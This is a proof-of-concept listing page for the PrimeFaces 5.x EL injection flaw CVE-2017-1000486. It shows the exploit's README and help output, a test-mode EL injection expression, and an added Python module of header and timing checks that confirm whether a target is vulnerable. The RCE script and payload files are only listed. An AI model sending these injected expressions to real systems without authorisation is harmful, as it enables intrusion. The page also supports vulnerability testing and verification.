
CVE-2017-1000486 PoC — Primetek Primefaces cryptographic issue vulnerability

Source
Associated Vulnerability
Title: Primetek Primefaces cryptographic issue vulnerability (CVE-2017-1000486)
Description: Primetek Primefaces is an open-source UI library used in Java EE applications. Primetek Primefaces 5.x contains a cryptographic issue vulnerability. A remote attacker can exploit it to execute code.
Description
Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486)
Readme
# CVE-2017-1000486

Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486), an Expression Language (EL) injection that can be used to gain Remote Code Execution (RCE) on a target.

## Vulnerability description
You can find an excellent description of the vulnerability on the [Minded Security blog](https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html).

## Usage

The exploit provides a help function that prints all important parameters:

```bash
./primefaces.py --help

PrimeFaces 5.x EL injection exploit (CVE-2017-1000486) by MOGWAI LABS
=====================================================================

usage: primefaces.py [-h] [-t] [-e EXTENSION] url [payload]

PrimeFaces 5.x EL injection exploit

positional arguments:
  url                   The target URL (http/https)
  payload               File with the JavaScript (Rhino/Nashorn) code to
                        execute or OS command

optional arguments:
  -h, --help            show this help message and exit
  -t, --test            Test mode (off by default)
  -e EXTENSION, --extension EXTENSION
                        Extension of the target (xhtml, jsf)

```

The exploit provides a simple test mode (-t parameter) that can be used to verify whether a target is actually vulnerable.
It works by sending the following EL expression to the target, which makes the server add an extra header field to the HTTP response.
The exploit then checks the response for that header:

```
${facesContext.getExternalContext().setResponseHeader("MOGWAILABS","CHKCHK")}
```

Actual exploitation works by invoking the JavaScript interpreter that is bundled with the Java VM (Rhino or Nashorn, depending on the Java version).
This allows arbitrary Java code to be executed from JavaScript.

The exploit provides two example payloads:

- payload.js (execute an OS command)
- sleep.js (sleep for 4 seconds, delaying the response)

Please note that none of these examples returns the output of the command.
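Because neither example payload returns command output, the two signals a tester actually has are the marker header from test mode and the delay caused by sleep.js. The following Python is an added example (not part of the MOGWAI LABS PoC) that isolates that decision logic so it can be exercised offline: the HTTP transport is abstracted behind a `send` callable (an assumption; the real PoC's request format is not shown on this page), the `Reply` type and `BENIGN_EXPRESSION` no-op are constructed here, and the fake senders in the `__main__` block stand in for a target.

```python
"""Blind oracles for confirming PrimeFaces 5.x EL injection.

Added example, not code from the MOGWAI LABS PoC. The transport is
abstracted as a callable `send(expression) -> Reply` (assumption) so the
header and timing checks can be tested without a live target.
"""
import statistics
from dataclasses import dataclass, field
from typing import Callable, Dict

HEADER_NAME = "MOGWAILABS"
HEADER_VALUE = "CHKCHK"

# Test-mode expression from the README: when evaluated by the target it
# adds a marker header to the HTTP response.
TEST_EXPRESSION = (
    '${facesContext.getExternalContext().setResponseHeader("'
    + HEADER_NAME + '","' + HEADER_VALUE + '")}'
)

# Assumed no-op expression, used only to measure baseline latency.
BENIGN_EXPRESSION = "${''}"


@dataclass
class Reply:
    """Minimal view of an HTTP response (constructed for this example)."""
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    elapsed: float = 0.0  # seconds between sending the request and the reply


Sender = Callable[[str], Reply]


def header_marker_present(reply: Reply) -> bool:
    """True if the marker header is present.

    Header names are case-insensitive and proxies may rewrite their case,
    so compare case-insensitively; values are compared after stripping
    surrounding whitespace.
    """
    for name, value in reply.headers.items():
        if name.lower() == HEADER_NAME.lower() and value.strip() == HEADER_VALUE:
            return True
    return False


def vulnerable_by_header(send: Sender) -> bool:
    """Header oracle: send the test expression, look for the marker."""
    return header_marker_present(send(TEST_EXPRESSION))


def vulnerable_by_delay(send: Sender, sleep_expression: str,
                        expected_delay: float = 4.0, runs: int = 3,
                        tolerance: float = 0.5) -> bool:
    """Timing oracle for payloads like sleep.js that return no output.

    A slow target is not a vulnerable target: the baseline latency of a
    benign request is measured first, and the sleep payload must add at
    least `tolerance * expected_delay` seconds on top of it (medians of
    `runs` samples, to dampen a single jittery request).
    """
    baseline = statistics.median(send(BENIGN_EXPRESSION).elapsed for _ in range(runs))
    slowed = statistics.median(send(sleep_expression).elapsed for _ in range(runs))
    return (slowed - baseline) >= expected_delay * tolerance


if __name__ == "__main__":
    # Constructed fake senders standing in for a target.
    def fake_vulnerable(expr: str) -> Reply:
        hdrs = {"mogwailabs": "CHKCHK"} if "setResponseHeader" in expr else {}
        return Reply(200, hdrs, 4.2 if "sleep" in expr else 0.2)

    def fake_slow_but_patched(expr: str) -> Reply:
        return Reply(200, {"Content-Type": "text/html"}, 5.0)

    print("vulnerable (header):", vulnerable_by_header(fake_vulnerable))
    print("vulnerable (delay): ", vulnerable_by_delay(fake_vulnerable, "sleep 4"))
    print("slow target (delay):", vulnerable_by_delay(fake_slow_but_patched, "sleep 4"))
```

The header check is the cheaper and more reliable of the two; the timing check is what remains when the application strips or rewrites response headers, and the baseline measurement is what keeps a merely slow target from being reported as vulnerable.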


File Snapshot

```
[4.0K] /data/pocs/4b371876b17ba258f3ca246ee40100969996ba8a
├── [  59] payload.js
├── [4.1K] primefaces.py
├── [1.9K] README.md
├── [  23] requirements.txt
└── [  32] sleep.js

0 directories, 5 files
```